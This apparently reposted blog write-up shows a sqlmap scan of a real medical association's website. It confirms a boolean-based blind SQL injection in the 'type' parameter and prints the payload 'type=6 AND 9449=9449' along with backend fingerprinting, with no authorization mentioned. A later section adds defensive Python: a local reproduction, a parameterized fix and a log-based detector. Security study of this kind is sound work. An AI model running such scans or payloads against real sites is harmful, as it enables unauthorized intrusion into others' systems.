• SQL injection vulnerability in a certain medical association's website


    Go straight for the trusty tool, sqlmap:

    PS C:\security tools\sqlmap-master> python.exe .\sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
             _
     ___ ___| |_____ ___ ___  {1.0.5.46#dev}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap
    d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 20:17:12
    
    [20:17:12] [INFO] testing connection to the target URL
    [20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
    do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
    [20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
    [20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [20:17:15] [WARNING] WAF/IDS/IPS product hasn't been identified (generic protection response)
    [20:17:15] [INFO] testing if the target URL is stable
    [20:17:16] [INFO] target URL is stable
    [20:17:16] [INFO] testing if GET parameter 'type' is dynamic
    [20:17:17] [INFO] confirming that GET parameter 'type' is dynamic
    [20:17:17] [INFO] GET parameter 'type' is dynamic
    [20:17:17] [INFO] heuristic (basic) test shows that GET parameter 'type' might be injectable (possible DBMS: 'Microsoft SQL Server')
    [20:17:17] [INFO] testing for SQL injection on GET parameter 'type'
    it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] 1
    [20:17:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [20:17:27] [INFO] GET parameter 'type' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
    [20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e
    [20:17:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
    [20:17:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [20:17:45] [INFO] checking if the injection point on GET parameter 'type' is a false positive
    [20:17:48] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between
    GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
    ---
    Parameter: type (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: type=6 AND 9449=9449
    ---
    [20:18:04] [INFO] testing Microsoft SQL Server
    [20:18:04] [INFO] confirming Microsoft SQL Server
    [20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2003 or XP
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2000
    [20:18:05] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times
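The finding above is a boolean-based blind injection in the `type` parameter of `edu.asp`: sqlmap's payload `type=6 AND 9449=9449` returns the same page as `type=6`, while a false condition would return a different one. The following is an added example, not code from the original post or from the affected site. It reproduces that behaviour with a hypothetical `people` table in an in-memory SQLite database (a stand-in for the SQL Server 2000 backend the scan reported), shows the hardened handler that validates and binds the parameter, and flags the same payload shape in constructed IIS W3C log lines (the field order is assumed to be the default IIS layout).

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed stand-in for the site's database: SQLite in memory with a
    hypothetical 'people' table whose 'type' column is the category edu.asp filters on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT, type INTEGER)")
    conn.executemany("INSERT INTO people (name, type) VALUES (?, ?)",
                     [("alice", 6), ("bob", 6), ("carol", 7)])
    return conn


def edu_vulnerable(conn, type_param):
    """Query built by string concatenation, the way a classic ASP page typically does it.
    The raw 'type' value lands in the WHERE clause, so '6 AND 9449=9449' keeps the
    rows and '6 AND 9449=9450' drops them; that visible difference is exactly what
    sqlmap's boolean-based blind test measures."""
    sql = "SELECT name FROM people WHERE type=" + type_param + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def edu_hardened(conn, type_param):
    """Validate that 'type' is a plain integer, then bind it as a query parameter.
    Anything else is rejected before a single byte reaches the DBMS."""
    if not re.fullmatch(r"[0-9]{1,9}", type_param):
        raise ValueError("type must be a small non-negative integer")
    sql = "SELECT name FROM people WHERE type=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(type_param),))]


def hardened_rejects(type_param):
    """True when the hardened handler refuses the value before any query runs."""
    try:
        edu_hardened(make_db(), type_param)
    except ValueError:
        return True
    return False


# Tautology / contradiction pairs ('AND 9449=9449', 'OR 1=2') in a query string.
BOOL_BLIND = re.compile(r"(?i)\b(AND|OR)\s+(\d+)\s*=\s*(\d+)")

# Constructed IIS W3C log lines; the request pattern mirrors the scan above.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-06-13 20:17:16 10.0.0.5 GET /people/edu.asp type=6 80 - 203.0.113.9 sqlmap/1.0.5.46 200
2016-06-13 20:17:25 10.0.0.5 GET /people/edu.asp type=6%20AND%209449=9449 80 - 203.0.113.9 sqlmap/1.0.5.46 200
2016-06-13 20:17:26 10.0.0.5 GET /people/edu.asp type=6%20AND%209449=9450 80 - 203.0.113.9 sqlmap/1.0.5.46 200
2016-06-13 20:18:01 10.0.0.5 GET /people/edu.asp type=7 80 - 198.51.100.4 Mozilla/5.0 200
""".splitlines()


def flag_iis_log(lines):
    """Return (client_ip, decoded_query, kind) for every log line whose query string
    carries a boolean tautology or contradiction. Assumed field order (default IIS W3C):
    date time s-ip method uri-stem uri-query port user c-ip user-agent status."""
    hits = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 10:
            continue
        query = unquote_plus(fields[5])
        m = BOOL_BLIND.search(query)
        if m:
            kind = "tautology" if m.group(2) == m.group(3) else "contradiction"
            hits.append((fields[8], query, kind))
    return hits


if __name__ == "__main__":
    db = make_db()
    print(edu_vulnerable(db, "6"))                  # ['alice', 'bob']
    print(edu_vulnerable(db, "6 AND 9449=9449"))    # same rows: the 'true' response
    print(edu_vulnerable(db, "6 AND 9449=9450"))    # []: the 'false' response
    print(hardened_rejects("6 AND 9449=9449"))      # True
    for hit in flag_iis_log(SAMPLE_LOG):
        print(hit)
```

The paired true/false requests from one client within seconds of each other are the signal to alert on, regardless of the User-Agent; sqlmap announces itself here, but the same payload shape from a browser UA would be just as telling. On the application side the fix is the hardened handler: reject anything that is not an integer, then bind the value instead of concatenating it.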
  • Original post: https://www.cnblogs.com/janepeak/p/5581959.html
Copyright © 2020-2023  润新知